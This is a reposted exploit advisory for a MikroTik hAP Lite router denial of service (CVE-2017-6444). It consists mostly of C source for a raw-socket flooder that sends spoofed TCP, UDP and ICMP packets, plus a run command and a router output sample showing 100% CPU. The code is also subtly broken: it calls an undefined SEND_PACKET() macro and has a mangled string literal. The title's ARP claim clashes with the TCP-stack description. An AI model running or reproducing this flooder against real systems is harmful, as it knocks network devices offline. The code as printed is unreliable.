Home / os / winxp

MikroTik Router Denial Of Service ARP Table OverFlow

Posted on 30 November -0001

<HTML><HEAD><TITLE>MikroTik Router Denial Of Service | ARP Table OverFlow</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> ################ #CVE:2017-6444 #Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow #Exploit Author: Hosein Askari (FarazPajohan) #Vendor HomePage: https://mikrotik.com/ #Series : Hap Lite #Tested on: Parrot Security OS #Date: 03-3-2017 #Category: Network Appliance #Vulnerable Part: TCP Stack #Author Mail :hosein.askari@aol.com #Description: #The MikroTik Router has not protection mechanism for the case of a fast network connection which allows remote attackers to cause a denial of service (CPU consumption) by sending many TCP ACK packets. after the #attacker stops the exploit , the CPU usage is 100% and the router should be reboot again for working normally. ################ #Exploit Command : # ~~~#exploit.out -T0 -h <MikroTik_ip> -p [23,23] ################ #Exploit Code : #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netdb.h> #include <sys/types.h> #ifdef F_PASS #include <sys/stat.h> #endif #include <netinet/in_systm.h> #include <sys/socket.h> #include <string.h> #include <time.h> #ifndef __USE_BSD # define __USE_BSD #endif #ifndef __FAVOR_BSD # define __FAVOR_BSD #endif #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <netinet/ip_icmp.h> #include <arpa/inet.h> #ifdef LINUX # define FIX(x) htons(x) #else # define FIX(x) (x) #endif #define TCP_ACK 1 #define TCP_FIN 2 #define TCP_SYN 4 #define TCP_RST 8 #define UDP_CFF 16 #define ICMP_ECHO_G 32 #define TCP_NOF 64 #define TCP_URG 128 #define TH_NOF 0x0 #define TCP_ATTACK() (a_flags & TCP_ACK || a_flags & TCP_FIN || a_flags & TCP_SYN || a_flags & TCP_RST || a_flags & TCP_NOF || a_flags & TCP_URG ) #define UDP_ATTACK() (a_flags & UDP_CFF) #define ICMP_ATTACK() (a_flags & ICMP_ECHO_G) #define CHOOSE_DST_PORT() dst_sp == 0 ? random () : htons(dst_sp + (random() % (dst_ep -dst_sp +1))); #define CHOOSE_SRC_PORT() src_sp == 0 ? random () : htons(src_sp + (random() % (src_ep -src_sp +1))); #define KET() if (sendto(rawsock, &packet, (sizeof packet), 0, (struct sockaddr *)&target, sizeof target) < 0) { perror("sendto"); exit(-1); } #define BANNER_CKSUM 54018 u_long lookup(const char *host); unsigned short in_cksum(unsigned short *addr, int len); static void inject_iphdr(struct ip *ip, u_char p, u_char len); char *class2ip(const char *class); static void send_tcp(u_char th_flags); static void send_udp(u_char garbage); static void send_icmp(u_char garbage); char *get_plain(const char *crypt_file, const char *xor_data_key); static void usage(const char *argv0); u_long dstaddr; u_short dst_sp, dst_ep, src_sp, src_ep; char *src_class, *dst_class; int a_flags, rawsock; struct sockaddr_in target; const char *banner = "Written By C0NSTANTINE"; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct { int gv; int kv; void (*f)(u_char); } a_list[] = { { TCP_ACK, TH_ACK, send_tcp }, { TCP_FIN, TH_FIN, send_tcp }, { TCP_SYN, TH_SYN, send_tcp }, { TCP_RST, TH_RST, send_tcp }, { TCP_NOF, TH_NOF, send_tcp }, { TCP_URG, TH_URG, send_tcp }, { UDP_CFF, 0, send_udp }, { ICMP_ECHO_G, ICMP_ECHO, send_icmp }, { 0, 0, (void *)NULL }, }; int main(int argc, char *argv[]) { int n, i, on = 1; int b_link; #ifdef F_PASS struct stat sb; #endif unsigned int until; a_flags = dstaddr = i = 0; dst_sp = dst_ep = src_sp = src_ep = 0; until = b_link = -1; src_class = dst_class = NULL; while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) { char *p; switch (n) { case 'T': switch (atoi(optarg)) { case 0: a_flags |= TCP_ACK; break; case 1: a_flags |= TCP_FIN; break; case 2: a_flags |= TCP_RST; break; case 3: a_flags |= TCP_SYN; break; case 4: a_flags |= TCP_URG; break; } break; case 'U': a_flags |= UDP_CFF; break; case 'I': a_flags |= ICMP_ECHO_G; break; case 'N': a_flags |= TCP_NOF; break; case 's': src_class = optarg; break; case 'h': dstaddr = lookup(optarg); break; case 'd': dst_class = optarg; i = 1; break; case 'p': if ( (p = (char *) strchr(optarg, ',')) == NULL) usage(argv[0]); dst_sp = atoi(optarg); dst_ep = atoi(p +1); break; case 'q': if ( (p = (char *) strchr(optarg, ',')) == NULL) usage(argv[0]); src_sp = atoi(optarg); src_ep = atoi(p +1); break; case 'l': b_link = atoi(optarg); if (b_link <= 0 || b_link > 100) usage(argv[0]); break; case 't': until = time(0) +atoi(optarg); break; default: usage(argv[0]); break; } } if ( (!dstaddr && !i) || (dstaddr && i) || (!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) || (src_sp != 0 && src_sp > src_ep) || (dst_sp != 0 && dst_sp > dst_ep)) usage(argv[0]); srandom(time(NULL) ^ getpid()); if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } target.sin_family = AF_INET; for (n = 0; ; ) { if (b_link != -1 && random() % 100 +1 > b_link) { if (random() % 200 +1 > 199) usleep(1); continue; } for (i = 0; a_list[i].f != NULL; ++i) { if (a_list[i].gv & a_flags) a_list[i].f(a_list[i].kv); } if (n++ == 100) { if (until != -1 && time(0) >= until) break; n = 0; } } exit(0); } u_long lookup(const char *host) { struct hostent *hp; if ( (hp = gethostbyname(host)) == NULL) { perror("gethostbyname"); exit(-1); } return *(u_long *)hp->h_addr; } #define RANDOM() (int) random() % 255 +1 char * class2ip(const char *class) { static char ip[16]; int i, j; for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i) if (class[i] == '.') ++j; switch (j) { case 0: sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM()); break; case 1: sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM()); break; case 2: sprintf(ip, "%s.%d", class, RANDOM()); break; default: strncpy(ip, class, 16); break; } return ip; } unsigned short in_cksum(unsigned short *addr, int len) { int nleft = len; int sum = 0; unsigned short *w = addr; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(unsigned char *) (&answer) = *(unsigned char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return answer; } static void inject_iphdr(struct ip *ip, u_char p, u_char len) { ip->ip_hl = 5; ip->ip_v = 4; ip->ip_p = p; ip->ip_tos = 0x08; /* 0x08 */ ip->ip_id = random(); ip->ip_len = len; ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_dst.s_addr = dst_class != NULL ? inet_addr(class2ip(dst_class)) : dstaddr; ip->ip_src.s_addr = src_class != NULL ? inet_addr(class2ip(src_class)) : random(); target.sin_addr.s_addr = ip->ip_dst.s_addr; } static void send_tcp(u_char th_flags) { struct cksum cksum; struct packet { struct ip ip; struct tcphdr tcp; } packet; memset(&packet, 0, sizeof packet); inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet)); packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); cksum.pseudo.saddr = packet.ip.ip_src.s_addr; packet.tcp.th_flags = random(); packet.tcp.th_win = random(); packet.tcp.th_seq = random(); packet.tcp.th_ack = random(); packet.tcp.th_off = 5; packet.tcp.th_urp = 0; packet.tcp.th_sport = CHOOSE_SRC_PORT(); packet.tcp.th_dport = CHOOSE_DST_PORT(); cksum.tcp = packet.tcp; packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); SEND_PACKET(); } static void send_udp(u_char garbage) { struct packet { struct ip ip; struct udphdr udp; } packet; memset(&packet, 0, sizeof packet); inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet)); packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.udp.uh_sport = CHOOSE_SRC_PORT(); packet.udp.uh_dport = CHOOSE_DST_PORT(); packet.udp.uh_ulen = htons(sizeof packet.udp); packet.udp.uh_sum = 0; SEND_PACKET(); } static void send_icmp(u_char gargabe) { struct packet { struct ip ip; struct icmp icmp; } packet; memset(&packet, 0, sizeof packet); inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet)); packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.icmp.icmp_type = ICMP_ECHO; packet.icmp.icmp_code = 0; packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8)); for(int pp=0;pp<=1000;pp++) {SEND_PACKET(); pp++; } } static void usage(const char *argv0) { printf("%s ", banner); printf(" -U UDP attack e[1;37m(e[0me[0;31mno optionse[0me[1;37m)e[0m "); printf(" -I ICMP attack e[1;37m(e[0me[0;31mno optionse[0me[1;37m)e[0m "); printf(" -N Bogus attack e[1;37m(e[0me[0;31mno optionse[0me[1;37m)e[0m "); printf(" -T TCP attack e[1;37m[e[0m0:ACK, 1:FIN, 2:RST, 3:SYN, 4:URGe[1;37m]e[0m "); printf(" -h destination host/ip e[1;37m(e[0me[0;31mno defaulte[0me[1;37m)e[0m "); printf(" -d destination class e[1;37m(e[0me[0;31mrandome[0me[1;37m)e[0m "); printf(" -s source class/ip e[1;37m(e[me[0;31mrandome[0me[1;37m)e[0m "); printf(" -p destination port range [start,end] e[1;37m(e[0me[0;31mrandome[0me[1;37m)e[0m "); printf(" -q source port range [start,end] e[1;37m(e[0me[0;31mrandome[0me[1;37m)e[0m "); printf(" -l pps limiter e[1;37m(e[0me[0;31mno limite[0me[1;37m)e[0m "); printf(" -t timeout e[1;37m(e[0me[0;31mno defaulte[0me[1;37m)e[0m "); printf("e[1musagee[0m: %s [-T0 -T1 -T2 -T3 -T4 -U -I -h -p -t] ", argv0); exit(-1); } ########################################### #The sample of "CPU Usage" : [admin@MikroTik] > system resource monitor cpu-used: 100% cpu-used-per-cpu: 100% free-memory: 5148KiB </BODY></HTML>

 

TOP